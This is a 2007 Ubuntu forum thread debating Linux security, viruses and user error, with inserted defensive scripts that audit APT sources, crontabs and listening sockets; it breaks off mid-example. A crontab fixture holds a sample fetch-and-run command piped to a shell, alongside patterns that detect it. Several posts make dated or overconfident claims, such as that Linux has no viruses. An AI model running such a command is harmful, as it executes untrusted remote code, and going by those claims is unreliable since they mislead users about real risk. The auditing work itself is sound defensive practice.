By the way, I'm not trying to say that Windows is more secure than Linux (or vice-versa, for that matter), I just don't think Linux users should believe that they are not vulnerable.
-Dave
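Added example, not part of the thread: the untrusted-repository case raised in the post above can be checked from the defender's side by listing every APT source that is not an official Ubuntu archive host or that has signature checking switched off. The function name `audit_sources`, the official-host pattern and the sample lines are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit APT one-line source entries (sources.list format).
# Reads entries on stdin and prints "finding<TAB>host" for every entry that
# needs review. The set of "official" hosts is an assumption of this example:
# archive.ubuntu.com, its country mirrors (xx.archive.ubuntu.com) and
# security.ubuntu.com.
audit_sources() {
    awk '
    /^[ \t]*#/ { next }                          # comment
    /^[ \t]*$/ { next }                          # blank line
    $1 != "deb" && $1 != "deb-src" { next }      # not a source entry
    {
        # An optional "[option=value ...]" block sits between type and URI.
        i = 2
        opts = ""
        if ($i ~ /^\[/) {
            while (i <= NF) {
                opts = opts " " $i
                last = ($i ~ /\]$/)
                i++
                if (last) break
            }
        }
        uri = $i

        # Reduce the URI to its host name.
        host = tolower(uri)
        sub(/^[a-z+]+:\/\//, "", host)           # strip scheme
        sub(/[\/:].*$/, "", host)                # strip port and path
        if (host == "") host = uri               # file:///path style source

        # trusted=yes tells APT to skip signature verification.
        if (opts ~ /trusted=yes/)
            printf "signature-check-disabled\t%s\n", host

        # Match the whole host name, anchored at both ends, so a lookalike
        # such as archive.ubuntu.com.mirror.example.invalid does not pass.
        if (host !~ /^(([a-z0-9-]+\.)?archive|security)\.ubuntu\.com$/)
            printf "non-official\t%s\n", host
    }'
}

# Constructed sample input (not taken from any real system).
SAMPLE_SOURCES='# /etc/apt/sources.list (constructed sample)
deb http://archive.ubuntu.com/ubuntu feisty main restricted
deb-src http://us.archive.ubuntu.com/ubuntu feisty universe
deb http://security.ubuntu.com/ubuntu feisty-security main
deb http://archive.ubuntu.com.mirror.example.invalid/ubuntu feisty main
deb [trusted=yes] http://repo.example.invalid/packages feisty main'

printf '%s\n' "$SAMPLE_SOURCES" | audit_sources
```

On a real system, feed it `/etc/apt/sources.list` and the files under `/etc/apt/sources.list.d/`; a "non-official" finding is a prompt to decide whether you trust that publisher, not proof of a problem.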
BrokeBody
April 19th, 2007, 04:37 PM
Why don't you enlighten us? Provide a link to what the heck you're talking about.
I only have some good books about it. :( If I find some good links, I'll post it. ;)
I'm not trying to say that Windows is more secure than Linux (or vice-versa, for that matter), I just don't think Linux users should believe that they are not vulnerable.
Of course, nothing is safe! ;) You may have the best protection, but if you don't know what you're doing, it doesn't matter then. :P I have a friend who never had any problems with security, but when he installed Firestarter, and thought he configured it fine, that's when the intrusions started. :lolflag:
dbott67
April 19th, 2007, 04:44 PM
@BrokeBody:
About cron: if you are inferring that cron jobs can only be run as root, you are mistaken. In the Debian/Ubuntu model, there is no normal root user; cron jobs are set in the user's crontab and do not require a password:
crontab -e
The above command will allow you to edit the existing user's crontab and add/remove anything you like. You can also add stuff to the user's SESSION.
My point is that there is no one single point of entry on any computer system. Social engineering, unpatched applications, services and OSes, unnecessary services, poor passwords, installing unknown/untrusted programs, buffer overflows, viruses, malware, etc. are all ways into a system. Linux may be better at some things, but it can and does get hacked.
Be diligent with security. Keep your OS up-to-date. Run a firewall. Turn off unneeded services. Do not install from untrusted sources. Run Clam. Run rootkit hunter.
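Added example, not part of the thread: because a user's crontab can be changed without root, as the post above points out, it is worth reviewing alongside the system-wide checks. The function name `audit_crontab`, its three heuristics and the sample crontab are assumptions made for this example.

```shell
#!/bin/sh
# Added example: review a user crontab for entries worth a closer look.
# Reads crontab text on stdin, prints "reason<TAB>command" per flagged job.
# The three heuristics are assumptions chosen for this example.
audit_crontab() {
    awk '
    /^[ \t]*#/ { next }                               # comment
    /^[ \t]*$/ { next }                               # blank line
    /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }   # MAILTO=, PATH=, ...
    {
        # A job is either "@keyword command" or five time fields + command.
        first = ($1 ~ /^@/) ? 2 : 6
        if (NF < first) next                          # malformed, no command
        cmd = $first
        for (i = first + 1; i <= NF; i++) cmd = cmd " " $i
        padded = " " cmd " "                          # simplifies word matching

        reason = ""
        if (padded ~ /(curl|wget)[^|;&]*\|[ \t]*(sh|bash)[ \t;&|]/)
            reason = "fetch-and-run"                  # download piped to a shell
        else if (padded ~ /[ \t;&|]\/(tmp|var\/tmp|dev\/shm)\//)
            reason = "temp-dir"                       # program in world-writable dir
        else if ($1 == "@reboot")
            reason = "at-reboot"                      # starts with every boot

        if (reason != "") printf "%s\t%s\n", reason, cmd
    }'
}

# Constructed sample input (not taken from any real system).
SAMPLE_CRONTAB='# crontab for user alice (constructed sample)
MAILTO=""
30 2 * * * /home/alice/bin/backup.sh
*/10 * * * * wget -q -O - http://updates.example.invalid/x | sh
@reboot /home/alice/bin/sync-photos
15 * * * * /tmp/.cache/helper --quiet'

printf '%s\n' "$SAMPLE_CRONTAB" | audit_crontab
```

`crontab -l | audit_crontab` checks the current user's table; an "at-reboot" finding is only a reminder to confirm you added that job yourself.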
dbott67
April 19th, 2007, 05:04 PM
Of course, nothing is safe! ;) You may have the best protection, but if you don't know what you're doing, it doesn't matter then...
Now we're on the same page... if only we could keep the end-users away from the system! :)
Take care,
-Dave
jdhore
April 19th, 2007, 06:13 PM
Now we're on the same page... if only we could keep the end-users away from the system! :)
Take care,
-Dave
here's what i think the answer is...Thin clients...all our apps and OS and stuff will be run from fat servers on the interwebs and EVERYONE will just have a thinclient that automagically connects to those interweb servers and there you have all your stuff
didijeeeke
April 19th, 2007, 06:41 PM
here's what i think the answer is...Thin clients...all our apps and OS and stuff will be run from fat servers on the interwebs and EVERYONE will just have a thinclient that automagically connects to those interweb servers and there you have all your stuff
Well, the end user uses XDMCP in your case so it is the same as working on a local system, only the CPU tasks are done on the server.
igknighted
April 19th, 2007, 07:14 PM
- What if it's downloaded from a repository (untrusted (http://www.flickr.com/photos/trevi55/296804891/)* or not)?
- What if some guy creates a .deb file and hosts it on their server for everyone to download and install (ever use Automatix (http://www.getautomatix.com/wiki/index.php?title=Installation#Ubuntu_7.04_.28Feisty_i386.29)?)
- What if somebody sends a gullible person a script and says, oh yeah, before it'll run you need to:
chmod +x naked-pics-of-britney.sh
- What if the hacker enters via any number of other ways and marks it as executable themselves?
- What if a buffer overflow (http://www.securityfocus.com/bid/22771/discuss) in some desktop applications that can run arbitrary code
* the above link shows a prank that some guy played on a bunch of Ubuntu users who used Trevino's repo to install Beryl. You might be smart enough not to eat yellow snow, but there are plenty of users who don't have a clue and will do whatever they're told --- it's lemon-flavoured, I promise!
Ubuntu had an unpatched VNC vulnerability (https://bugs.launchpad.net/ubuntu/+source/vnc4/+bug/77383) for 8 months (discovered in May 2006, not patched until January 2007)! No need to hack... hell, the bad guys could connect without needing a password! Add to that all of the various PHP, SQL and other applications and services that someone might be running and you have a number of ways that your system could be compromised.
Why don't you enlighten us? Provide a link to what the heck you're talking about.
By the way, I'm not trying to say that Windows is more secure than Linux (or vice-versa, for that matter), I just don't think Linux users should believe that they are not vulnerable.
-Dave
90% of what you have listed is user error. Of course anyone can write a script to harm your computer or host a bad deb... but when the OS tells users NOT to install untrusted content and gives them alternatives... then the user is at fault. You can never idiot-proof the user. That said, for people with common sense who don't enter their root password when they shouldn't, this isn't an issue. The long delay on the bug-fix is alarming, though if you are behind a firewall like a router it's not important (and in reality, everyone should be using firewalls). I still hold that BSD is more secure (not counting OSX), but Linux is pretty darn good too.
beercz
April 19th, 2007, 08:44 PM
I think this article explains the issues quite well.
http://www.theregister.co.uk/security/security_report_windows_vs_linux/
darrenm
April 20th, 2007, 04:24 AM
Sorry mate, just have to follow up on a few of these :)
- What if it's downloaded from a repository (untrusted (http://www.flickr.com/photos/trevi55/296804891/)* or not)?
You still have to enter the sudo password to let it do anything harmful.
- What if some guy creates a .deb file and hosts it on their server for everyone to download and install (ever use Automatix (http://www.getautomatix.com/wiki/index.php?title=Installation#Ubuntu_7.04_.28Feisty_i386.29)?)
You still have to enter the sudo password to let it do anything harmful.
- What if somebody sends a gullible person a script and says, oh yeah, before it'll run you need to:
chmod +x naked-pics-of-britney.sh
So the script is then executable. Doesn't mean it can do anything more than the current user has permission to do.
- What if the hacker enters via any number of other ways and marks it as executable themselves?
Which other ways?
- What if a buffer overflow (http://www.securityfocus.com/bid/22771/discuss) in some desktop applications that can run arbitrary code
That bug only allows something to run code as the current user. There are no privilege escalations with it.
* the above link shows a prank that some guy played on a bunch of Ubuntu users who used Trevino's repo to install Beryl. You might be smart enough not to eat yellow snow, but there are plenty of users who don't have a clue and will do whatever they're told --- it's lemon-flavoured, I promise!
Where? I read the link and it didn't say anything about that.
Ubuntu had an unpatched VNC vulnerability (https://bugs.launchpad.net/ubuntu/+source/vnc4/+bug/77383) for 8 months (discovered in May 2006, not patched until January 2007)! No need to hack... hell, the bad guys could connect without needing a password!
Yes unacceptable. As a side note I've never trusted VNC and always used NX.
Add to that all of the various PHP, SQL and other applications and services that someone might be running and you have a number of ways that your system could be compromised.
Such as what? Are we talking about a home user or a web server? A home user won't be running web facing PHP scripts, same with SQL. In the enterprise SQL is only ever not locked down to localhost if it's locked down to other IPs and that's only by sysadmins who really should know what they're doing. Nigh on no-one running a home machine is not NAT'd so if anything's web facing then someone has done it on purpose.
Root is a brick wall, no matter what. Even if a script or application is made executable it still needs root privileges to do anything REALLY nasty. Sure it can wipe out your home dir and all your family photos or whatever but it can't look at /etc/shadow and run john on it to find out all your system passwords or start writing 0's to your HDD etc. The only time root isn't a brick wall is if a root exploit is present on an unpatched system (and I haven't heard of any for any Linux distro for some time)
dbott67
April 20th, 2007, 10:08 AM
Sorry mate, just have to follow up on a few of these :)
No problem, Darren. My main point about all of this is that your system is only as secure as the weakest point --- mostly the users. Either the people that you know who run computers are really savvy, or you greatly underestimate the gullibility, naivete and stupid actions of end-users! :)
Many Linux users are computer hobbyists or professionals and enjoy learning and understanding how the system works. Now that distros like Ubuntu are becoming mainstream and ending up pre-installed on Dells (and reviving the life out of older computers for mom & dad and other non-techies), there will be a new breed of Linux users. These users will be the same ones who've been running XP as admin, not running an up-to-date AV, not running a firewall, not running Windows update, opening unsolicited attachments, etc.
You still have to enter the sudo password to let it do anything harmful.
Yes, you do. But that's never stopped a gullible user from doing it. My point about the .debs and untrusted repos is that the user is willingly choosing to install the software. And if you think they don't, then I'll show you a few hundred thousand users of Kazaa, Morpheus, audiogalaxy, grokster, Limewire, Imesh, Gnutella that will beg to differ.
There was a Windows virus a few years back (Bagle?) that came in a password protected ZIP file. The e-mail contained the password to unlock the ZIP. Amazingly, people took the password from the e-mail and opened the ZIP file!
Trust me on this, if Linux prompts them to enter their password, they will! :)
So the script is then executable. Doesn't mean it can do anything more than the current user has permission to do.
No, but it may go out and download a .deb from somewhere, and then prompt the user to install it: "Hey! Something wants me to enter my password --- it better be good!"
Which other ways?
Again, depends on the installed applications and services, as well as the state of the apps and OS with regards to security updates, web facing apps/services, weak/default/no password. A few notable examples:
- Slapper Worm (http://www.symantec.com/security_response/writeup.jsp?docid=2002-091311-5851-99) (from 2002, but still illustrates the point. Even after the bug was announced, 70% of apache systems tested were unpatched according to this article (http://www.newscientist.com/article.ns?id=dn3090)).
- CPanel Hack: (http://news.netcraft.com/archives/2006/09/23/hostgator_cpanel_security_hole_exploited_in_mass_hack.html) (granted, most home users wouldn't be running CPanel)
Sept. 23, 2006: HostGator says hackers compromised its servers using a previously unknown security hole in cPanel, the control panel software that is widely used by hosting providers. "I can tell you with all accuracy that this is definitely due to a cPanel exploit that provides root access and all cPanel servers are affected," said HostGator system administrator Tim Greer. "This issue affects all versions of cPanel, from what I can tell, from years ago to the current releases, including Stable, Release, Current and Edge."
- Check Secunia (http://secunia.com/historic_advisories/): Of the 25 vulnerabilities listed for April 19th & 20th, 10 are "Highly Critical" and all but 3 are cross-platform (1 is OSX; 2 are Windows only and the rest are apps that are either cross-platform or distro specific - RedHat, Slackware).
That bug only allows something to run code as the current user. There are no privilege escalations with it.
The write-up on the page does not discount privilege escalation:
An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.
By the way, my references are just single examples (perhaps not the best example of what sort of damage that can be done, either).
Where? I read the link and it didn't say anything about that.
Here's the link to the whole story (http://www.pthree.org/2006/11/23/untrusted-repositories/), with links back through the mayhem at Ubuntu Forums.
Such as what? Are we talking about a home user or a web server? A home user won't be running web facing PHP scripts, same with SQL. In the enterprise SQL is only ever not locked down to localhost if it's locked down to other IPs and that's only by sysadmins who really should know what they're doing. Nigh on no-one running a home machine is not NAT'd so if anything's web facing then someone has done it on purpose.
We're talking mostly home users. I emphasized your point about sysadmins because the average home user is probably not a sysadmin. There are many (perhaps a small percentage overall, but not an insignificant number) of people who want to learn about programming, development, being a sysadmin, apache, postfix, php, perl, sql, etc. and will install these packages on their computer so that they can play with it and learn it.
Running any of these apps facing the web can be a disaster waiting to happen: default accounts not locked out, weak passwords, unpatched bugs, etc. People do this stuff all the time. Take a look in these forums --- there are dozens of threads asking for help on how to setup a web/mail/sql server. Here's the first one I found (http://ubuntuforums.org/showthread.php?t=403908&highlight=setting+up+a+home+web+server).
Root is a brick wall, no matter what. Even if a script or application is made executable it still needs root privileges to do anything REALLY nasty. Sure it can wipe out your home dir and all your family photos or whatever but it can't look at /etc/shadow and run john on it to find out all your system passwords or start writing 0's to your HDD etc. The only time root isn't a brick wall is if a root exploit is present on an unpatched system (and I haven't heard of any for any Linux distro for some time)
Finally, I don't disagree that Linux has a superior security model. I think the OSX/Debian style security is one of the best models to use, however, the biggest weakness generally sits between the keyboard and the chair.
Take care,
Dave
darrenm
April 20th, 2007, 10:35 AM
the biggest weakness generally sits between the keyboard and the chair.
Fair enough. I can't really think of much of a way to make it much better though. Other than the 'It looks like you are trying to do something that may be harmful, please enter your password again to confirm', 'please enter your password one more time to really confirm' which leads to 'are you sure you wish to turn off repeated security nagging?'
dbott67
April 20th, 2007, 12:36 PM
Fair enough. I can't really think of much of a way to make it much better though...
Me neither (outside of education). I think the current model works as it should. People rarely read disclaimers and EULAs and warnings and blah, blah, blah, blah, blah... They just click "YES", "I AGREE", "OK" as fast as they can and hope that they'll be using the software in less than 1 minute (no manuals for me!).
I think Douglas Engelbart (http://en.wikipedia.org/wiki/Douglas_Engelbart) (co-inventor of the computer mouse, hypertext and gui precursors) said it best (I'm paraphrasing here --- I can't find a reference to the interview he gave on TechTV a few years back) about how software companies are constantly "lowering the bar" with respect to computers. He spoke about how the computer is such a wonderful & powerful tool that can be used to accomplish so much more if only people would "raise the bar" and learn to use it.
Of course, all of this might have a down-side --- I might be out of a job!
aysiu
April 21st, 2007, 05:51 AM
I don't want this to turn into a Mac-bashing session, so please don't make it one. If you do, I'll just move those posts to the Jail.
I saw a news article today: Hacker breaks into Mac at security conference: $10,000 prize for the CanSecWest challenge winner (http://computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=cybercrime_and_hacking&articleId=9017380&taxonomyId=82&intsrc=kc_top)
Some interesting snippets:
In winning the contest, he exposed a hole in Safari, Apple Inc.'s browser. "Currently, every copy of OS X out there now is vulnerable to this," said Sean Comeau, one of the organizers of CanSecWest.
The conference organizers decided to offer the contest in part to draw attention to possible security shortcomings in Macs. "You see a lot of people running OS X saying it's so secure and frankly Microsoft is putting more work into security than Apple has," said Dragos Ruiu, the principal organizer of security conferences including CanSecWest.
The URL opened a blank page but exposed a vulnerability in input handling in Safari, Comeau said. An attacker could use the vulnerability in a number of ways, but Di Zovie used it to open a back door that gave him access to anything on the computer, Comeau said.
One reason Macs haven't been much of a target for hackers is that there are fewer to attack, said Terri Forslof, manager of security response for TippingPoint. "It's an incentive issue. The Mac is not as widely deployed of a platform as say Windows," she said. In this case, the cash may have provided motivation.
So my question is: are there vulnerabilities similar to this in Ubuntu? Would it be possible that someone could just send a URL that would then allow complete access to the computer? I've seen Javascript exploits come up for Firefox quite often, but they usually get patched within a week, if not a few days.
In other words, it's not really possible to have a completely secure (even leaving out user stupidity) system, right? The only real issue is... trying to get something as good as possible and then patching vulnerabilities as soon as they're discovered. Is that a fair assessment?
BoyOfDestiny
April 21st, 2007, 06:03 AM
I don't want this to turn into a Mac-bashing session, so please don't make it one. If you do, I'll just move those posts to the Jail.
I saw a news article today: Hacker breaks into Mac at security conference: $10,000 prize for the CanSecWest challenge winner (http://computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=cybercrime_and_hacking&articleId=9017380&taxonomyId=82&intsrc=kc_top)
Some interesting snippets: So my question is: are there vulnerabilities similar to this in Ubuntu? Would it be possible that someone could just send a URL that would then allow complete access to the computer? I've seen Javascript exploits come up for Firefox quite often, but they usually get patched within a week, if not a few days.
In other words, it's not really possible to have a completely secure (even leaving out user stupidity) system, right? The only real issue is... trying to get something as good as possible and then patching vulnerabilities as soon as they're discovered. Is that a fair assessment?
I agree.
If anything it's like an immune system. You challenge it, fight off colds etc, and gain immunity.
I want security holes to be found and patched as fast as possible... It helps that the code is out in the open I think, rather than something buried in a blackbox that may one day be stumbled upon...
*cough*
http://securitywatch.eweek.com/exploits_and_attacks/microsoft_urges_workaround_as_worm_hits_unpatched_dns_flaw.html
And these folks are at one vendor's mercy too...
argie
April 21st, 2007, 07:18 AM
Any idea if it affects Konqueror too? I mean, they're a bit similar aren't they?
slimdog360
April 21st, 2007, 07:35 AM
well in linux I've never had any spyware, viruses, malware, trojans etc. For the most of it I've never had an antivirus. There was a month or so there when using mepis that I had an antivirus running but that was just because it came with it.
Kunstar
April 25th, 2007, 08:18 AM
and I quote
While malware is a growing problem for users of Windows operating systems, there is little evidence of the problem affecting users of Apple Macs running OS X or PCs installed with Linux.
full story here at: http://news.bbc.co.uk/1/hi/technology/6591183.stm
Somenoob
April 25th, 2007, 08:21 AM
Why was this article even written? it's quite a well known fact.
prizrak
April 25th, 2007, 09:05 AM
Well known to you and me perhaps but not necessarily the general public. Articles like that on BBC are very good it helps create awareness among less technically inclined.
tombott
April 25th, 2007, 09:12 AM
Why was this article even written? it's quite a well known fact.
lol, what side of the bed did you get out of?
DoctorMO
April 25th, 2007, 09:13 AM
I know a number of people who work for the BBC technical staff and according to the rumours it goes something like this:
1) BBC fails to mention Ubuntu Feisty launch, complaints hit inbox
2) BBC Reports on Microsoft Asia deal $3 windows and isn't critical of why they're doing it and doesn't mention open source or linux; cue second barrage of complaints.
3) Someone mentions that constantly ignoring Linux is possibly in breach of the BBC's charter to not favour any one business.
4) Mention Linux in Sophos press-release/'news article' to redress an assumed imbalance in the reporting.
Although why they couldn't have just reported the ubuntu launch or have been more critical towards Microsoft's motives in the first place is obviously where they should be trying to make amends.
Oh well, the BBC have such a weird view that if something has a vocal minority (i.e Linux) then they need to offset it by ignoring it so they don't get into trouble with being imbalanced. Unfortunately they're obviously not equipped to deal with industry press releases and so are simply ignoring the general public's voice.
Stone123
April 25th, 2007, 10:12 AM
lol, what side of the bed did you get out of?
:mrgreen:
I agree that this is just a fact in an endless loop. I do however expect mirrors like these :
deb http://freePrograms/~virus/ main
steven8
April 25th, 2007, 11:09 AM
lol, what side of the bed did you get out of?
Apparently the wrong side, and. . .oh wow! - A Leo Sayer avatar!!??!! Too cool.
Somenoob
April 25th, 2007, 11:50 AM
lol, what side of the bed did you get out of?
I woke up on the side where Captain Obvious should not be.
tombott
April 25th, 2007, 11:59 AM
I woke up on the side where Captain Obvious should not be.
lol, fair enough but to be fair the article isn't just about linux but if it highlights to non linux users that linux is a more secure OS than Windows surely it can be no bad thing?
tombott
April 25th, 2007, 11:59 AM
Apparently the wrong side, and. . .oh wow! - A Leo Sayer avatar!!??!! Too cool.
lol, you can touch him if you like!
steven8
April 25th, 2007, 12:13 PM
lol, you can touch him if you like!
I haven't seen that picture in 20+ years. :guitar:
Lopsicle
April 25th, 2007, 01:51 PM
I haven't seen that picture in 20+ years. :guitar:
Still, only half the age of your avatar picture :lolflag:
tgalati4
April 25th, 2007, 02:14 PM
I feel like dancing!
swoll1980
June 4th, 2007, 04:52 AM
How sure are we that we're immune to viruses? Is it a waste of resources to keep it running? Does anybody know anybody that ever had a virus, or know someone that knew someone? If nobody is running virus software how do we know that we don't have a virus right now? How do I know you don't have a virus?
Am I just being paranoid or do you ever wonder the same thing? Hasn't your cpu been acting a little funny lately?:D
Corvinis
June 4th, 2007, 05:00 AM
Well there are known linux viruses. It couldn't hurt :)
(And I did have funny cpu activity yesterday :o)
candtalan
June 4th, 2007, 05:12 AM
Linux viruses are very rare partly because the environment is not fertile for them to spread.
You need to enter a password to install at system level, so any damage from say a user level install (non password) affects user files (hopefully backed up?). More important is probably control of your i/o ports - and ubuntu comes with all ports closed by default. A Firewall GUI is easy to get if you want visibility. The best basic security measure is to avoid an adsl (usb) modem but to use an adsl router (ethernet).
rich.bradshaw
June 4th, 2007, 06:01 AM
There are no viruses for linux at the moment. I wouldn't bother with antivirus anyway - what's the point?
Keep yourself behind a router and you will have no problems at all.
TomMK
June 4th, 2007, 06:52 AM
But that still seems complacent to me. It is considered good practice, essential really, to run anti-virus, anti-spyware, firewall, and have automatic updates enabled etc in windows. I understand that it's less dangerous to do without that in Linux, but surely it's still good practice? Look at what happened to XP in 2004 which led to a complete rethinking of SP2. The same thing could happen to Linux, surely?
gn2
June 4th, 2007, 07:18 AM
It is considered good practice, essential really, to run anti-virus, anti-spyware, firewall, and have automatic updates enabled etc in windows.
1: Linux isn't Windows
2: NEVER allow Windows update to run fully automatic, as it can easily install an incorrect hardware driver and render your PC non-bootable. (I speak from bitter experience)
kpel
June 4th, 2007, 07:30 AM
2: NEVER allow Windows update to run fully automatic, as it can easily install an incorrect hardware driver and render your PC non-bootable. (I speak from bitter experience)
QFT.
tweakedenigma
June 4th, 2007, 07:30 AM
Most of us are worried when we first come over this is true, and If you would feel better having AV installed go Ahead, But unlike windows most Linux Virus Scanners do not run in the background all the time and you will Need to scan actively. Now I will also mention that as most things are installed from the Repos or from trusted sites it's not a real problem either.
Honestly though, it's not needed any more here than it is on the Mac; it's a waste.
PartisanEntity
June 4th, 2007, 07:34 AM
Some users run anti-virus software in Linux in order to scan files or emails they received from Windows users and which they will send to other Windows users. This way, you can prevent viruses from being sent to your friends and family.
TomMK
June 4th, 2007, 07:35 AM
You didn't answer my question though: Why is it not considered complacent to run without anti-virus?
If i were to install Ubuntu 7.04 on a relative's PC, and leave it with them, without anti-virus, and updates not on automatic, and i went back 5/6 years later (expected life of a family pc), can i really expect it to be virus free, after that long?
tweakedenigma
June 4th, 2007, 07:39 AM
You didn't answer my question though: Why is it not considered complacent to run without anti-virus?
If i were to install Ubuntu 7.04 on a relative's PC, and leave it with them, without anti-virus, and updates not on automatic, and i went back 5/6 years later (expected life of a family pc), can i really expect it to be virus free, after that long?
The system will tell them when there are updates and it will be up to them to install if they choose to do so.
Perhaps this will answer the question for you. http://www.theregister.co.uk/2003/10/06/linux_vs_windows_viruses/
Feba
June 4th, 2007, 07:40 AM
Running an antivirus on linux is sorta like putting up an armed guard at a church. You could, but what the hell is the point?
Like was said above, LINUX IS NOT WINDOWS. If you try to think of Linux as a free version of windows, you are going to have a very very bad time. Linux is like a motorcycle, and Windows is a sedan. They both get you from A to B, but they do it in very different ways, and if you try to steer a motorcycle like you would a car, you're going to end up in a very nasty crash.
EDIT: actually, to go with the motorcycle analogy, what you're doing is coming into a group of bikers, and asking us why we don't lock our doors.
rich.bradshaw
June 4th, 2007, 07:47 AM
Remember that there aren't any viruses for Linux - even though most webservers run on it - that's a pretty big target, and there still aren't any. Linux is fundamentally different to Windows. The whole concept of a virus only exists because of the shoddiness of Microsoft code.
timcredible
June 4th, 2007, 07:54 AM
i've been using linux exclusively for about 8 years, I've got relatives running linux for the last 3 years, and even with teenagers who browse the internet to all sorts of unreputable sites, and they click on any ad they see on the screen, and double-click on any email attachment they get from their friends, none of these machines have ever had a problem. and i never run updates - i just install from cd, install the apps i want, and leave it until i feel like changing distros (usually about once a year).
az
June 4th, 2007, 07:55 AM
But that still seems complacent to me. It is considered good practice, essential really, to run anti-virus, anti-spyware, firewall, and have automatic updates enabled etc in windows. I understand that it's less dangerous to do without that in Linux, but surely it's still good practice? Look at what happened to XP in 2004 which led to a complete rethinking of SP2. The same thing could happen to Linux, surely?
It is complacent to not get updates, but there is no need for a virus scanner, malware scanner or a firewall on a desktop.
Viruses are a particular category of vulnerability that exploit breaches in windows that cannot be closed, since closing them would break millions of people's computers. In GNU/Linux, this sort of thing does not exist. The software is more malleable.
Malware such as spyware, exploits the fact that you don't know what your computer is doing. Since GNU/Linux is Free-libre open source software, it would be very very unlikely that anyone could write some malware into the applications that make it into the archives.
A firewall is plain useless on a desktop. You will have to let traffic through any ports that need to use them. In Ubuntu, you know at all times what is listening to the network. Nothing is done behind your back. Not knowing (or not having the ability to know) what your computer is doing is the real vulnerability in proprietary operating systems.
You didn't answer my question though: Why is it not considered complacent to run without anti-virus?
If i were to install Ubuntu 7.04 on a relative's PC, and leave it with them, without anti-virus, and updates not on automatic, and i went back 5/6 years later (expected life of a family pc), can i really expect it to be virus free, after that long?
Well, it would not upgrade from one release to the next automatically. If it did, and if a virus scanner (or some other kind of security tool) really became necessary, it probably would be part of the base install and thus get installed along with other security upgrades.
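The point above about knowing what is listening to the network can be checked from the kernel's own socket table. This is an added example, not part of the original post: it decodes text in the /proc/net/tcp layout (IPv4 only, little-endian host assumed) and separates loopback-only listeners from ones reachable from the network. The sample table and all function names are constructed for illustration.

```python
import ipaddress
import os
import socket
import struct

TCP_LISTEN = "0A"  # kernel state code for a listening TCP socket

# Constructed sample in /proc/net/tcp layout (not captured from a real host):
# a print service on loopback, a web server on all interfaces, and one
# established outbound connection that must not be reported as a listener.
SAMPLE = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11001 1 0000000000000000 100 0 0 10 0\n"
    "   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 11002 1 0000000000000000 100 0 0 10 0\n"
    "   2: 0A01A8C0:8C3E 010200C0:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 11003 1 0000000000000000 20 4 30 10 -1\n"
)


def decode_addr(hex_addr):
    """Turn '0100007F:0277' into ('127.0.0.1', 631).

    The kernel prints the IPv4 address as one 32-bit word in host byte
    order; this decoder assumes a little-endian host (x86, most ARM).
    """
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def listening_sockets(proc_net_tcp_text):
    """Return one dict per socket in LISTEN state."""
    found = []
    for line in proc_net_tcp_text.splitlines():
        fields = line.split()
        # Data rows start with a slot number such as '0:'; skip the header.
        if len(fields) < 10 or not fields[0].endswith(":"):
            continue
        if fields[3] != TCP_LISTEN:
            continue
        ip, port = decode_addr(fields[1])
        found.append({"ip": ip, "port": port,
                      "uid": int(fields[7]), "inode": int(fields[9])})
    return found


def reachable_from_network(sockets):
    """Listeners bound to anything other than a loopback address."""
    return [s for s in sockets
            if not ipaddress.ip_address(s["ip"]).is_loopback]


if __name__ == "__main__":
    path = "/proc/net/tcp"
    if os.path.exists(path):
        with open(path) as fh:
            text = fh.read()
    else:
        text = SAMPLE
    for s in listening_sockets(text):
        scope = "loopback only" if ipaddress.ip_address(s["ip"]).is_loopback else "NETWORK"
        print(f'{s["ip"]}:{s["port"]:<6} uid={s["uid"]:<6} {scope}')
```

A listener on 0.0.0.0 owned by a service account is the case worth a second look on a home machine where a web, mail or SQL server was installed to experiment with.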
ckempo
June 4th, 2007, 08:01 AM
But that still seems complacent to me. It is considered good practice, essential really, to run anti-virus, anti-spyware, firewall, and have automatic updates enabled etc in windows. I understand that it's less dangerous to do without that in Linux, but surely it's still good practice? Look at what happened to XP in 2004 which led to a complete rethinking of SP2. The same thing could happen to Linux, surely?
Not really. Windows is set out in a different manner to the Unix-based OSes.
The thing is, that it needn't have happened to Windows. If Microsoft, all those years ago when XP launched, had insisted that the first user created on the system was an admin, and couldn't be used for anything other than system backup/restore type tasks, and then forced people to create another, lower-privileged account for general computer use, then the world would be in a different place now.
The reason they didn't (mainly) is usability. Joe Sixpack doesn't want to be told they can't do xyz because of their access rights (think - if your computer at home told you "na-na, can't do that" - wouldn't you feel a tad annoyed? Especially if there's no-one "tech" enough to explain why?) - they just want to do it. Hence people just clicking "OK" or "Yes" to every dialog box they are presented with.
PCs in the workplace are different. You expect to be told that you can't access x or do y because of the user id you are - think of huge corps with 1000's of machines, or even small companies with <50 - it's the same thing, not every user is an admin). For example, would you expect to be able to access the same resources as somebody on the board of directors? Or your boss? No, probably not, so you accept being told that certain things are off-limits.
An ideal world would mean bringing some of this work-based mentality home, and accepting that just because it's your PC doesn't mean you deserve to be running as an admin user on it all the time, allowing anything to run and do what it wants. This is where the Unix-based OSes rule - no "root" desktop sessions by default, for example, meaning even if some malicious code did get executed, there's only a single user affected, not compromising the whole system.
TomMK
June 4th, 2007, 08:27 AM
I read the articles some people quoted. I understand better why linux is seemingly immune to viruses - although i wouldn't say i was convinced - yet. So i'll pick up on a different point i made - automatic updates. Microsoft discovered the hard way that people can't be trusted to update, and so turned it on by default in SP2. Now Ubuntu seems to be making that same 'mistake'. comments?
Another thing - this is probably a noobish question: The article on The Register states that email attachments are less dangerous because you would first have to give the file executable permissions before you could run it. Sounds good. But what if I create an executable file in linux and email to another linux user? Is it not executable to them any more?
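On the executable-attachment question above: the execute bit is metadata held by the file system, not part of the file's bytes, so a file written out from a mail message in the ordinary way starts without it. This is an added example, not from the original thread; the addresses, file names and the harmless script are constructed, and it assumes a Linux host with /bin/sh.

```python
import os
import stat
import subprocess
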